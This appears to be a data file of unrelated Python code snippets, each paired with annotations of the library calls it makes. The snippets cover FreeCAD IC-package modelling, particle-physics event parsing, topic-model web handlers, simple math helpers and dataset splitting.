    height = random.randint(100, 300)
    response = requests.get(f"https://picsum.photos/{width}/{height}")
    return base64.b64encode(response.content).decode('ascii')
# Substrings that mark a location name as unwanted (used by print_template).
exclusions = ["To ", "Outside ", "Away ", " to ", "Near ", " of "]

# Use a context manager so the file handle is closed deterministically
# (the original left it open for the life of the process).
with open("locations.json") as locations_file:
    j = json.load(locations_file)

# ldict maps name -> name: it acts as an insertion-ordered, duplicate-free
# set of location names collected from regions and their sub-locations.
ldict = {}
for region in j["regions"]:
    name = region["location"]
    ldict[name] = name
    for subregion in region["subLocation"]:
        if subregion != "":
            ldict[subregion] = subregion

for location in ldict:
    print_template(ldict[location])
"json.load",
"random.randint",
"requests.get"
] | [((765, 790), 'json.load', 'json.load', (['locations_file'], {}), '(locations_file)\n', (774, 790), False, 'import json\n'), ((477, 501), 'random.randint', 'random.randint', (['(200)', '(500)'], {}), '(200, 500)\n', (491, 501), False, 'import random\n'), ((510, 534), 'random.randint', 'random.randint', (['(100)', '(300)'], {}), '(100, 300)\n', (524, 534), False, 'import random\n'), ((192, 212), 'random.randint', 'random.randint', (['(1)', '(3)'], {}), '(1, 3)\n', (206, 212), False, 'import random\n'), ((606, 623), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (618, 623), False, 'import requests\n')] |
import numpy as np
def sigmoid(x):
    """Logistic function 1 / (1 + exp(-x)), elementwise for arrays.

    Implemented as exp(-logaddexp(0, -x)), which is mathematically identical
    but numerically stable: the naive form overflows np.exp for large
    negative x (RuntimeWarning), while logaddexp never exponentiates a
    large positive argument.
    """
    return np.exp(-np.logaddexp(0, -x))
def log_loss(x, y, eps=1e-6):
    """Binary cross-entropy between predictions x and labels y.

    Predictions are clipped into [eps, 1 - eps] so both logarithms stay finite.
    """
    clipped = np.clip(x, eps, 1 - eps)
    positive_term = y * np.log(clipped)
    negative_term = (1 - y) * np.log(1 - clipped)
    return -(positive_term + negative_term)
"numpy.clip",
"numpy.exp",
"numpy.log"
] | [((109, 133), 'numpy.clip', 'np.clip', (['x', 'eps', '(1 - eps)'], {}), '(x, eps, 1 - eps)\n', (116, 133), True, 'import numpy as np\n'), ((57, 67), 'numpy.exp', 'np.exp', (['(-x)'], {}), '(-x)\n', (63, 67), True, 'import numpy as np\n'), ((147, 156), 'numpy.log', 'np.log', (['x'], {}), '(x)\n', (153, 156), True, 'import numpy as np\n'), ((165, 178), 'numpy.log', 'np.log', (['(1 - x)'], {}), '(1 - x)\n', (171, 178), True, 'import numpy as np\n')] |
# Generates the 3D body of an IC package (QFP or QFN) in FreeCAD, with all
# geometry parameters taken from the command line.
from __future__ import print_function
import sys
# Make the system FreeCAD installation importable when run as a plain script.
sys.path.append('/usr/lib/freecad/lib')
print(sys.path)
import FreeCAD
import ImportGui
import FreeCADGui
import os
import Draft
# NOTE(review): os, Draft and ImportGui are unused in this visible portion --
# presumably needed later in the script; confirm before removing.
# FIXME assumes standoff of 0.5mm
# all distances in mm
# Conversion factor between mm and imperial units (name suggests mil);
# unused in the visible portion -- TODO confirm it is used later.
MMTOMIL = 0.3937
# CLI parameters (argv[0]/argv[1] are presumably consumed by the FreeCAD
# launcher -- confirm): output directory, part name, pin pitch, pin counts
# per side, pin dimensions, and body length/width/height.
directory = sys.argv[2]; name = sys.argv[3]; pitch = float(sys.argv[4])
nHorizontalPins = int(sys.argv[5]); nVerticalPins = int(sys.argv[6])
sizePinx = float(sys.argv[7]); sizePiny = float(sys.argv[8]); sizePinz = float(sys.argv[9]);
length = float(sys.argv[10]); width = float(sys.argv[11])
height = float(sys.argv[12])
# With 14+ arguments the package has an exposed pad (QFN); otherwise plain QFP.
mode = 'QFP'
if len(sys.argv) > 13:
    mode = 'QFN'
    sizeEpadx = float(sys.argv[13])
    sizeEpady = float(sys.argv[14])
# NOTE: App, Gui and Part below are globals injected by the FreeCAD Python
# environment; they are not imported in this file.
# go in sketch mode
Gui.activateWorkbench("SketcherWorkbench")
# create doc
App.newDocument()
App.setActiveDocument("Unnamed")
App.ActiveDocument=App.getDocument("Unnamed")
Gui.ActiveDocument=Gui.getDocument("Unnamed")
# create sketch
App.activeDocument().addObject('Sketcher::SketchObject','Sketch')
# Body outline sketch sits 0.05 mm above the board plane.
# NOTE(review): the FIXME above mentions a 0.5 mm standoff but the z offset
# here is 0.05 -- confirm which value is intended.
App.activeDocument().Sketch.Placement = App.Placement(
    App.Vector(0.0, 0.0, 0.05),
    App.Rotation(0.0, 0.0, 0.0, 1.0))
Gui.activeDocument().setEdit('Sketch')
# trace rectangle
# Four line segments forming a width x length rectangle centred at the origin.
App.ActiveDocument.Sketch.addGeometry(Part.Line(
    App.Vector(width/2.0, -length/2.0, 0),
    App.Vector(-width/2.0, -length/2.0, 0)))
App.ActiveDocument.Sketch.addGeometry(Part.Line(
    App.Vector(-width/2.0, -length/2.0, 0),
    App.Vector(-width/2.0, length/2.0, 0)))
App.ActiveDocument.Sketch.addGeometry(Part.Line(
    App.Vector(-width/2.0, length/2.0, 0),
    App.Vector(width/2.0, length/2.0, 0)))
App.ActiveDocument.Sketch.addGeometry(Part.Line(
    App.Vector(width/2.0, length/2.0, 0),
    App.Vector(width/2.0, -length/2.0, 0)))
App.ActiveDocument.recompute()
Gui.getDocument('Unnamed').resetEdit()
App.getDocument('Unnamed').recompute()
# create pad from sketch
# Extrude the rectangle upward by the package height to form the body.
Gui.activateWorkbench("PartDesignWorkbench")
App.activeDocument().addObject("PartDesign::Pad","Pad")
App.activeDocument().Pad.Sketch = App.activeDocument().Sketch
App.activeDocument().Pad.Length = height
App.ActiveDocument.recompute()
Gui.activeDocument().hide("Sketch")
# change pad color to black
Gui.getDocument("Unnamed").getObject("Pad").ShapeColor = (0.00,0.00,0.00)
Gui.getDocument("Unnamed").getObject("Pad").Visibility=False #Hide pad
# Add Cylinder
Gui.activateWorkbench("PartWorkbench")
App.ActiveDocument.addObject("Part::Cylinder","Cylinder")
FreeCAD.getDocument("Unnamed").getObject("Cylinder").Radius = sizePinx/2.
FreeCAD.getDocument("Unnamed").getObject("Cylinder").Height = height
FreeCAD.getDocument("Unnamed").getObject("Cylinder").Placement = App.Placement(
App.Vector(-width/2.0 + 2*sizePinx, length/2.0 - 1 + 2 * sizePinx, 0.1),
App.Rotation(0,0,0,1))
App.ActiveDocument.recompute()
# Pin Creation
App.ActiveDocument.addObject("Part::Box","HorizontalPin")
App.ActiveDocument.recompute()
FreeCAD.getDocument("Unnamed").getObject("HorizontalPin").Length = sizePinx
FreeCAD.getDocument("Unnamed").getObject("HorizontalPin").Width = sizePiny
FreeCAD.getDocument("Unnamed").getObject("HorizontalPin").Height = sizePinz
App.ActiveDocument.recompute()
# Horizontal pin Array creation
Gui.activateWorkbench("ArchWorkbench")
Draft.array(
App.getDocument("Unnamed").getObject("HorizontalPin"),
App.Vector(pitch, 0, 0), App.Vector(0, width-sizePiny, 0), nHorizontalPins, 2)
Gui.activateWorkbench("PartWorkbench")
shapesToFuse=[]
for obj in FreeCAD.ActiveDocument.Objects:
if obj.Name.find("HorizontalPin") != -1:
Gui.Selection.addSelection(obj)
shapesToFuse.append(obj)
App.activeDocument().addObject("Part::MultiFuse","HorizontalFusion")
App.activeDocument().HorizontalFusion.Shapes = shapesToFuse
App.ActiveDocument.recompute()
fuse = FreeCAD.ActiveDocument.getObject("HorizontalFusion")
fuse.Placement = App.Placement(
App.Vector(-((nHorizontalPins-1) * pitch / 2.0 + sizePinx / 2.), -length / 2., 0),
App.Rotation(0,0,0,1))
# Vertical pin Array creation
# Pin Creation
App.ActiveDocument.addObject("Part::Box","VerticalPin")
App.ActiveDocument.recompute()
FreeCAD.getDocument("Unnamed").getObject("VerticalPin").Length = sizePiny
FreeCAD.getDocument("Unnamed").getObject("VerticalPin").Width = sizePinx
FreeCAD.getDocument("Unnamed").getObject("VerticalPin").Height = sizePinz
App.ActiveDocument.recompute()
Draft.array(App.getDocument("Unnamed").getObject("VerticalPin"),
App.Vector(0, pitch, 0),
App.Vector(length-sizePiny, 0, 0),
nVerticalPins, 2)
Gui.activateWorkbench("PartWorkbench")
shapesToFuse=[]
for obj in FreeCAD.ActiveDocument.Objects:
if obj.Name.find("VerticalPin") != -1:
Gui.Selection.addSelection(obj)
shapesToFuse.append(obj)
App.activeDocument().addObject("Part::MultiFuse","VerticalFusion")
App.activeDocument().VerticalFusion.Shapes = shapesToFuse
App.ActiveDocument.recompute()
fuse = FreeCAD.ActiveDocument.getObject("VerticalFusion")
fuse.Placement = App.Placement(
App.Vector(-width / 2., -((nVerticalPins-1) * pitch / 2.0 + sizePinx / 2.), 0),
App.Rotation(0,0,0,1))
if mode == 'QFN':
# create the exposed pad
App.ActiveDocument.addObject("Part::Box","EPAD")
App.ActiveDocument.recompute()
FreeCAD.getDocument("Unnamed").getObject("EPAD").Length = sizeEpadx
FreeCAD.getDocument("Unnamed").getObject("EPAD").Width = sizeEpady
FreeCAD.getDocument("Unnamed").getObject("EPAD").Height = sizePinz
App.ActiveDocument.getObject("EPAD").Placement = App.Placement(
App.Vector(-sizeEpadx/2., -sizeEpady/2., 0),
App.Rotation(0, 0, 0, 1))
App.ActiveDocument.recompute()
Gui.ActiveDocument.getObject("Pad").Visibility=True
## Export as a step model
exp_objects = []
for obj in FreeCAD.ActiveDocument.Objects:
# select all but indivudial Spheres and Sketch
if (obj.Name.find("Pin") == -1) and (obj.Name.find("Sketch") == -1):
Gui.Selection.addSelection(obj)
exp_objects.append(obj)
else:
FreeCAD.ActiveDocument.removeObject(obj.Name)
App.activeDocument().addObject("Part::MultiFuse","Fusion2")
App.activeDocument().Fusion2.Shapes = exp_objects
App.ActiveDocument.recompute()
for obj in exp_objects:
FreeCAD.ActiveDocument.removeObject(obj.Name)
exp_objects= []
exp_objects.append(FreeCAD.ActiveDocument.getObject("Fusion2"))
ImportGui.export(exp_objects,os.path.join(directory, name + '.step'))
del exp_objects
# Scale to mil before export to VRML for KiCAD use
Draft.scale(FreeCAD.ActiveDocument.ActiveObject,
FreeCAD.Vector(MMTOMIL, MMTOMIL, MMTOMIL))
FreeCAD.ActiveDocument.removeObject("Fusion2")
### Export as a VRML model
exp_objects = []
exp_objects.append(FreeCAD.ActiveDocument.getObject("Scale"))
FreeCADGui.export(exp_objects,os.path.join(directory, name + '.wrl'))
del exp_objects
exit(1)
| [
"FreeCAD.ActiveDocument.getObject",
"os.path.join",
"FreeCAD.ActiveDocument.removeObject",
"FreeCAD.Vector",
"sys.path.append",
"FreeCAD.getDocument"
] | [((49, 88), 'sys.path.append', 'sys.path.append', (['"""/usr/lib/freecad/lib"""'], {}), "('/usr/lib/freecad/lib')\n", (64, 88), False, 'import sys\n'), ((3740, 3792), 'FreeCAD.ActiveDocument.getObject', 'FreeCAD.ActiveDocument.getObject', (['"""HorizontalFusion"""'], {}), "('HorizontalFusion')\n", (3772, 3792), False, 'import FreeCAD\n'), ((4849, 4899), 'FreeCAD.ActiveDocument.getObject', 'FreeCAD.ActiveDocument.getObject', (['"""VerticalFusion"""'], {}), "('VerticalFusion')\n", (4881, 4899), False, 'import FreeCAD\n'), ((6477, 6523), 'FreeCAD.ActiveDocument.removeObject', 'FreeCAD.ActiveDocument.removeObject', (['"""Fusion2"""'], {}), "('Fusion2')\n", (6512, 6523), False, 'import FreeCAD\n'), ((6116, 6161), 'FreeCAD.ActiveDocument.removeObject', 'FreeCAD.ActiveDocument.removeObject', (['obj.Name'], {}), '(obj.Name)\n', (6151, 6161), False, 'import FreeCAD\n'), ((6199, 6242), 'FreeCAD.ActiveDocument.getObject', 'FreeCAD.ActiveDocument.getObject', (['"""Fusion2"""'], {}), "('Fusion2')\n", (6231, 6242), False, 'import FreeCAD\n'), ((6273, 6312), 'os.path.join', 'os.path.join', (['directory', "(name + '.step')"], {}), "(directory, name + '.step')\n", (6285, 6312), False, 'import os\n'), ((6434, 6475), 'FreeCAD.Vector', 'FreeCAD.Vector', (['MMTOMIL', 'MMTOMIL', 'MMTOMIL'], {}), '(MMTOMIL, MMTOMIL, MMTOMIL)\n', (6448, 6475), False, 'import FreeCAD\n'), ((6589, 6630), 'FreeCAD.ActiveDocument.getObject', 'FreeCAD.ActiveDocument.getObject', (['"""Scale"""'], {}), "('Scale')\n", (6621, 6630), False, 'import FreeCAD\n'), ((6662, 6700), 'os.path.join', 'os.path.join', (['directory', "(name + '.wrl')"], {}), "(directory, name + '.wrl')\n", (6674, 6700), False, 'import os\n'), ((5900, 5945), 'FreeCAD.ActiveDocument.removeObject', 'FreeCAD.ActiveDocument.removeObject', (['obj.Name'], {}), '(obj.Name)\n', (5935, 5945), False, 'import FreeCAD\n'), ((2417, 2447), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (2436, 2447), False, 'import 
FreeCAD\n'), ((2491, 2521), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (2510, 2521), False, 'import FreeCAD\n'), ((2560, 2590), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (2579, 2590), False, 'import FreeCAD\n'), ((2880, 2910), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (2899, 2910), False, 'import FreeCAD\n'), ((2956, 2986), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (2975, 2986), False, 'import FreeCAD\n'), ((3031, 3061), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (3050, 3061), False, 'import FreeCAD\n'), ((4072, 4102), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (4091, 4102), False, 'import FreeCAD\n'), ((4146, 4176), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (4165, 4176), False, 'import FreeCAD\n'), ((4219, 4249), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (4238, 4249), False, 'import FreeCAD\n'), ((5175, 5205), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (5194, 5205), False, 'import FreeCAD\n'), ((5245, 5275), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (5264, 5275), False, 'import FreeCAD\n'), ((5314, 5344), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (5333, 5344), False, 'import FreeCAD\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from db.BOW_DB import BOW_DB
from db.LDA_DB import LDA_DB
from vis.TermTopicMatrix3 import TermTopicMatrix3
def index():
with BOW_DB() as bow_db:
with LDA_DB() as lda_db:
handler = TermTopicMatrix3(request, response, bow_db, lda_db)
return handler.GenerateResponse()
def GetTerms():
with BOW_DB() as bow_db:
with LDA_DB() as lda_db:
handler = TermTopicMatrix3(request, response, bow_db, lda_db)
data = handler.GetTerms()
dataStr = json.dumps(data, encoding='utf-8', indent=2, sort_keys=True)
response.headers['Content-Type'] = 'application/json'
return dataStr
def GetTopics():
with BOW_DB() as bow_db:
with LDA_DB() as lda_db:
handler = TermTopicMatrix3(request, response, bow_db, lda_db)
data = handler.GetTopics()
dataStr = json.dumps(data, encoding='utf-8', indent=2, sort_keys=True)
response.headers['Content-Type'] = 'application/json'
return dataStr
def GetTermTopicMatrix():
with BOW_DB() as bow_db:
with LDA_DB() as lda_db:
handler = TermTopicMatrix3(request, response, bow_db, lda_db)
data = handler.GetTermTopicMatrix()
dataStr = json.dumps(data, encoding='utf-8', indent=2, sort_keys=True)
response.headers['Content-Type'] = 'application/json'
return dataStr
| [
"db.BOW_DB.BOW_DB",
"vis.TermTopicMatrix3.TermTopicMatrix3",
"json.dumps",
"db.LDA_DB.LDA_DB"
] | [((509, 569), 'json.dumps', 'json.dumps', (['data'], {'encoding': '"""utf-8"""', 'indent': '(2)', 'sort_keys': '(True)'}), "(data, encoding='utf-8', indent=2, sort_keys=True)\n", (519, 569), False, 'import json\n'), ((818, 878), 'json.dumps', 'json.dumps', (['data'], {'encoding': '"""utf-8"""', 'indent': '(2)', 'sort_keys': '(True)'}), "(data, encoding='utf-8', indent=2, sort_keys=True)\n", (828, 878), False, 'import json\n'), ((1145, 1205), 'json.dumps', 'json.dumps', (['data'], {'encoding': '"""utf-8"""', 'indent': '(2)', 'sort_keys': '(True)'}), "(data, encoding='utf-8', indent=2, sort_keys=True)\n", (1155, 1205), False, 'import json\n'), ((187, 195), 'db.BOW_DB.BOW_DB', 'BOW_DB', ([], {}), '()\n', (193, 195), False, 'from db.BOW_DB import BOW_DB\n'), ((357, 365), 'db.BOW_DB.BOW_DB', 'BOW_DB', ([], {}), '()\n', (363, 365), False, 'from db.BOW_DB import BOW_DB\n'), ((665, 673), 'db.BOW_DB.BOW_DB', 'BOW_DB', ([], {}), '()\n', (671, 673), False, 'from db.BOW_DB import BOW_DB\n'), ((983, 991), 'db.BOW_DB.BOW_DB', 'BOW_DB', ([], {}), '()\n', (989, 991), False, 'from db.BOW_DB import BOW_DB\n'), ((214, 222), 'db.LDA_DB.LDA_DB', 'LDA_DB', ([], {}), '()\n', (220, 222), False, 'from db.LDA_DB import LDA_DB\n'), ((247, 298), 'vis.TermTopicMatrix3.TermTopicMatrix3', 'TermTopicMatrix3', (['request', 'response', 'bow_db', 'lda_db'], {}), '(request, response, bow_db, lda_db)\n', (263, 298), False, 'from vis.TermTopicMatrix3 import TermTopicMatrix3\n'), ((384, 392), 'db.LDA_DB.LDA_DB', 'LDA_DB', ([], {}), '()\n', (390, 392), False, 'from db.LDA_DB import LDA_DB\n'), ((417, 468), 'vis.TermTopicMatrix3.TermTopicMatrix3', 'TermTopicMatrix3', (['request', 'response', 'bow_db', 'lda_db'], {}), '(request, response, bow_db, lda_db)\n', (433, 468), False, 'from vis.TermTopicMatrix3 import TermTopicMatrix3\n'), ((692, 700), 'db.LDA_DB.LDA_DB', 'LDA_DB', ([], {}), '()\n', (698, 700), False, 'from db.LDA_DB import LDA_DB\n'), ((725, 776), 'vis.TermTopicMatrix3.TermTopicMatrix3', 
'TermTopicMatrix3', (['request', 'response', 'bow_db', 'lda_db'], {}), '(request, response, bow_db, lda_db)\n', (741, 776), False, 'from vis.TermTopicMatrix3 import TermTopicMatrix3\n'), ((1010, 1018), 'db.LDA_DB.LDA_DB', 'LDA_DB', ([], {}), '()\n', (1016, 1018), False, 'from db.LDA_DB import LDA_DB\n'), ((1043, 1094), 'vis.TermTopicMatrix3.TermTopicMatrix3', 'TermTopicMatrix3', (['request', 'response', 'bow_db', 'lda_db'], {}), '(request, response, bow_db, lda_db)\n', (1059, 1094), False, 'from vis.TermTopicMatrix3 import TermTopicMatrix3\n')] |
from xml.etree.ElementTree import XMLParser
class MaxDepth:
maxdepth = 0
depth = 0
# Called for each opening tag
def start(self, tag, attrib):
self.depth += 1
if self.depth > self.maxdepth:
self.maxdepth = self.depth
# Called for each closing tag
def end(self, tag):
self.depth -= 1
def close(self):
return self.maxdepth
def main():
# Root depth = 0
# Find maximum depth
lines = int(input())
xmldoc = ''.join(input() for _ in range(lines))
target = MaxDepth()
parser = XMLParser(target=target)
parser.feed(xmldoc)
maxdepth = parser.close() - 1 # 0-based
print(f'{maxdepth}')
if __name__ == '__main__':
main()
| [
"xml.etree.ElementTree.XMLParser"
] | [((573, 597), 'xml.etree.ElementTree.XMLParser', 'XMLParser', ([], {'target': 'target'}), '(target=target)\n', (582, 597), False, 'from xml.etree.ElementTree import XMLParser\n')] |
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 17:54:18 2015
@author: anderson
"""
from setuptools import setup
import io
import version
def read(*filenames, **kwargs):
encoding = kwargs.get('encoding', 'utf-8')
sep = kwargs.get('sep', '\n')
buf = []
for filename in filenames:
with io.open(filename, encoding=encoding) as f:
buf.append(f.read())
return sep.join(buf)
long_description = read('README.rst')
setup(name='pyspyke',
version=version.version,
description='Python Package to analyse Spyke',
long_description=long_description,
url='https://github.com/britodasilva/pyspyke.git',
uthor='<NAME>',
author_email='<EMAIL>',
license='MIT',
install_requires=['numpy','matplotlib','scipy','h5py','sklearn'],
zip_safe=False)
| [
"setuptools.setup",
"io.open"
] | [((456, 793), 'setuptools.setup', 'setup', ([], {'name': '"""pyspyke"""', 'version': 'version.version', 'description': '"""Python Package to analyse Spyke"""', 'long_description': 'long_description', 'url': '"""https://github.com/britodasilva/pyspyke.git"""', 'uthor': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'license': '"""MIT"""', 'install_requires': "['numpy', 'matplotlib', 'scipy', 'h5py', 'sklearn']", 'zip_safe': '(False)'}), "(name='pyspyke', version=version.version, description=\n 'Python Package to analyse Spyke', long_description=long_description,\n url='https://github.com/britodasilva/pyspyke.git', uthor='<NAME>',\n author_email='<EMAIL>', license='MIT', install_requires=['numpy',\n 'matplotlib', 'scipy', 'h5py', 'sklearn'], zip_safe=False)\n", (461, 793), False, 'from setuptools import setup\n'), ((315, 351), 'io.open', 'io.open', (['filename'], {'encoding': 'encoding'}), '(filename, encoding=encoding)\n', (322, 351), False, 'import io\n')] |
import re
from typing import NamedTuple
import numpy as np
EVENT_TAG = '<event>'
INIT_TAG = '<init>'
INIT_END_TAG = '</init>'
FILE_END_TAG = '</LesHouchesEvents>'
class Parameters(NamedTuple):
id_a : int # IDBMUP(1)
id_b : int # IDBMUP(2)
energy_a : float # EBMUP(1)
energy_b : float # EBMUP(2)
pdfgup_a : int # PDFGUP(1)
pdfgup_b : int # PDFGUP(2)
pdfsup_a : int # PDFSUP(1)
pdfsup_b : int # PDFSUP(2)
weight : int # IDWTUP
nprup : int # NPRUP
xsecup : float # XSECUP(MAXPUP)
xerrup : float # XERRUP(MAXPUP)
xmaxup : float # XMAXUP(MAXPUP)
lprup : float # LPRUP(MAXPUP)
class Particle(NamedTuple):
pdgid : int # IDUP
status : int # ISTUP
mother_a : int # MOTHUP(1)
mother_b : int # MOTHUP(2)
color_a : int # ICOLUP(1)
color_b : int # ICOLUP(2)
px : float # PUP(1)
py : float # PUP(2)
pz : float # PUP(3)
E : float # PUP(4)
M : float # PUP(5)
lifetime : float # VTIMUP
spin : float # SPINUP
class Event(NamedTuple):
nparticles : int # NUP
subprocess : int # IDPRUP
weight : float # XWGTUP
scale : float # SCALUP
qedcoupling : float # AQEDUP
qcdcoupling : float # AQCDUP
particles : list # List of particles in the event
class Process(NamedTuple):
init : Parameters
events : list
# Reads LHEF file and stores the information in according classes
def ReadLHEF(filepath):
fp = open(filepath)
init = []
line = fp.readline()
while line.strip() != INIT_TAG: line = fp.readline()
line = fp.readline()
while line.strip() != INIT_END_TAG: # Reading the initialisation parameters
line = re.sub('\s+', ' ', line).strip().split(' ')
line = [float(i) for i in line]
init = init + line
line = fp.readline()
p = Process(Parameters(*init),[])
line = fp.readline()
while line.strip() != FILE_END_TAG: # Reading the events
if line.strip() == EVENT_TAG:
line = fp.readline()
line = re.sub('\s+', ' ', line).strip().split(' ')
line[0:2] = map(int, line[0:2])
line[2:6] = map(float, line[2:6])
e = Event(*line, [])
for i in range(e.nparticles):
line = fp.readline()
line = re.sub('\s+', ' ', line).strip().split(' ')
line[0:6] = map(int, line[0:6])
line[6:13] = map(float, line[6:13])
e.particles.append(Particle(*line))
p.events.append(e)
line = fp.readline()
return p | [
"re.sub"
] | [((1663, 1688), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'line'], {}), "('\\\\s+', ' ', line)\n", (1669, 1688), False, 'import re\n'), ((2019, 2044), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'line'], {}), "('\\\\s+', ' ', line)\n", (2025, 2044), False, 'import re\n'), ((2289, 2314), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'line'], {}), "('\\\\s+', ' ', line)\n", (2295, 2314), False, 'import re\n')] |
import random
import _jsonnet, json
import logging
import hashlib
import os
from copy import deepcopy
import pandas as pd
from tqdm import tqdm
import math
from LeapOfThought.resources.teachai_kb import TeachAIKB
from LeapOfThought.common.general import num2words1, bc
from LeapOfThought.common.data_utils import uniform_sample_by_column, pandas_multi_column_agg
# This is mainly for testing and debugging ...
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 2000)
pd.set_option('display.max_colwidth', 200)
pd.set_option("display.colheader_justify","left")
import numpy as np
from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class ArtiSet():
def __init__(self, args):
random.seed(17)
np.random.seed(1234)
self._np_seed = np.random.RandomState(17)
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), args.config_path) ,'r') as f:
self._config = json.load(f)[self.artiset_name]
if args.__contains__('variant') and len(args.variant) > 0:
self._output_file = args.output_file.replace('.jsonl','_' + args.variant + '.jsonl')
if len(args.experiment_version) > 0:
self._output_file = self._output_file.replace('.jsonl', '_' + args.experiment_version + '.jsonl')
else:
self._output_file = args.output_file
self._split = args.split_by_field
self._incorrect_beliefs = None
if "incorrect_beliefs_file" in args and args.incorrect_beliefs_file:
with open(args.incorrect_beliefs_file, 'r') as file:
self._incorrect_beliefs = [json.loads(line.strip()) for line in file]
self._save_sample = args.save_sample
self.artiset_data = []
def append_teachyourai_format_example(self, example, do_print=False, append_to_list=None):
"""append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
(that must contain a "phrase", "answer") and converts it to a BooleanQA format
Args:
example (dict): an example containing question,answer,dist1,dist2 fields
do_print (bool): just for debuging
num_choices (int): number of choices in question (between 2 and 5)
append_to_list (list): a
Returns:
"""
if 'context' not in example:
example['context'] = ''
if 'id' not in example:
example['id'] = self.create_qid(example)
if do_print:
print('a:%s d1:%s d2:%s || Q:%s' % (example['phrase'], example['answer']))
if append_to_list is not None:
append_to_list.append(example)
else:
self.artiset_data.append(example)
@staticmethod
def create_qid(example):
m = hashlib.md5()
m.update(example['phrase'].encode())
m.update(example['context'].encode())
# boolean examples have binary answer (int 0 or 1)
m.update(str(example['answer']).encode())
return m.hexdigest()
def split_by_columns(self):
split_columns = self._split.split(',')
examples = self.examples_meta
indexes = {}
# check the split columns are in the data
if len(set(split_columns) - set(examples.columns)) != 0:
raise (ValueError("split columns used to split dev/test and train set do not exist the examples_meta!"))
all_objs = []
for split_column in split_columns:
all_objs += list(examples[split_column])
#best_train_inds, best_dev_inds, best_test_inds = [], [], []
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
if len(split_columns) > 1:
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
dev_test_examples = examples.iloc[test_inds + dev_inds]
dev_test_objs = []
for split_column in split_columns:
dev_test_objs += list(dev_test_examples[split_column])
dev_test_objs = pd.Series(list(set(dev_test_objs)))
else:
# We'll choice the test-dev examples from values of split that have the lowest number of examples.
# this will insure we are choosing to highest amount of training examples that are still disjoint on split_columns[0] from dev+test
split_columns_value_counts = examples[split_columns[0]].value_counts().sort_values().cumsum().reset_index()
start_ind = split_columns_value_counts[split_columns_value_counts[split_columns[0]] > \
sum(self._config['test_dev_size'])].index[0] + 1
dev_test_objs = list(split_columns_value_counts['index'][0:start_ind])
dev_test_examples = examples[examples[split_columns[0]].isin(dev_test_objs)]
inds = list(dev_test_examples.index)
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
for split_column in split_columns:
indexes[split_column] = examples.set_index(split_column)
dev_ids = set()
not_in_train_ids = set()
for split_column in split_columns:
dev_ids = dev_ids & set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
not_in_train_ids = not_in_train_ids | set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
train_examples = examples.loc[~examples['qid'].isin(not_in_train_ids), :]
train_inds = list(train_examples.index)
if len(train_inds) > self._config['max_number_of_examples']:
train_inds = train_inds[0:self._config['max_number_of_examples']]
random.shuffle(train_inds)
print("total dev-test examples available: %d" % (len(dev_test_examples)))
print("split produced %d training examples" % (len(train_inds)))
return train_inds, dev_inds, test_inds
def save_dataset(self):
"""save_dataset() automatically saves the artiset
if the config output_file contains the string _sample.jsonl it will be saved in a more readable format
otherwise it will split the examples in self.artiset_data into train, dev, test and save them in s3
if output_file startswith s3:// otherwise locally. (If output_file is empty, it will not save)
Args:
arg1 (int): Description of arg1
arg2 (str): Description of arg2
Returns:
bool: Description of return value
"""
# Move non-required columns to metadata:
artiset_data_with_metadata = []
for example in self.artiset_data:
if 'metadata' not in example:
new_example = {'metadata':{}}
else:
new_example = {'metadata': example['metadata']}
new_example.update({k:example[k] for k in ['id', 'phrase', 'context', 'answer']})
new_example['metadata'].update({k: example[k] for k in set(example.keys()) - {'id', 'phrase', 'context', 'answer','metadata'}})
artiset_data_with_metadata.append(new_example)
self.artiset_data = artiset_data_with_metadata
# splitting
if len(self._split) > 0:
train_inds, dev_inds, test_inds = self.split_by_columns()
elif 'split' in self.examples_meta:
test_inds = list(self.examples_meta[self.examples_meta['split'] == 'test'].index)
dev_inds = list(self.examples_meta[self.examples_meta['split'] == 'dev'].index)
train_inds = list(self.examples_meta[self.examples_meta['split'] == 'train'].index)
random.seed(17)
random.shuffle(train_inds)
